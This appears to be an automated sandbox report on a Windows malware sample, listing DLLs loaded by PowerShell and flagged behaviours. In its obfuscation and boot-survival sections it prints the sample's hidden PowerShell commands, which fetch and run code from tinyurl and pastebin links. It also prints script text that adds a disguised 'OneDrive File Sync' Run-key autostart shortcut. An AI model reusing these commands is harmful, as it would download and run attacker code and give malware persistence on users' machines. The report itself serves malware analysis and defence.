Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: BeginSync lnk.lnkLNK file: ..\..\..\Windows\System32\forfiles.exe
Source: BeginSync.lnk.4.drLNK file: ..\..\..\Windows\System32\forfiles.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF7BFEF00BD pushad ; iretd 4_2_00007FF7BFEF00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF7BFF027E0 push FFFFFFE8h; retf 4_2_00007FF7BFF02AF1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF7BFF01EE7 push ebx; ret 4_2_00007FF7BFF01EEA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF7BFFC59EE push ds; retf 4_2_00007FF7BFFC5A0F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF7BFFCCB94 push ecx; retf 0000h4_2_00007FF7BFFCCB95
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF7BFFCCB9C push ecx; retf 0000h4_2_00007FF7BFFCCB9D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF7BFFCC8F2 pushad ; retf 4_2_00007FF7BFFCC8F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF7BFED00BD pushad ; iretd 11_2_00007FF7BFED00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF7BFEE785E push eax; iretd 11_2_00007FF7BFEE786D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF7BFEE782E pushad ; iretd 11_2_00007FF7BFEE785D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF7BFFA7AEB push ebp; iretd 11_2_00007FF7BFFA7AEC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF7BFFA6DC3 push edi; iretd 11_2_00007FF7BFFA6DC6

Persistence and Installation Behavior

barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Boot Survival

barindex
Powershell creates an autostart link
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
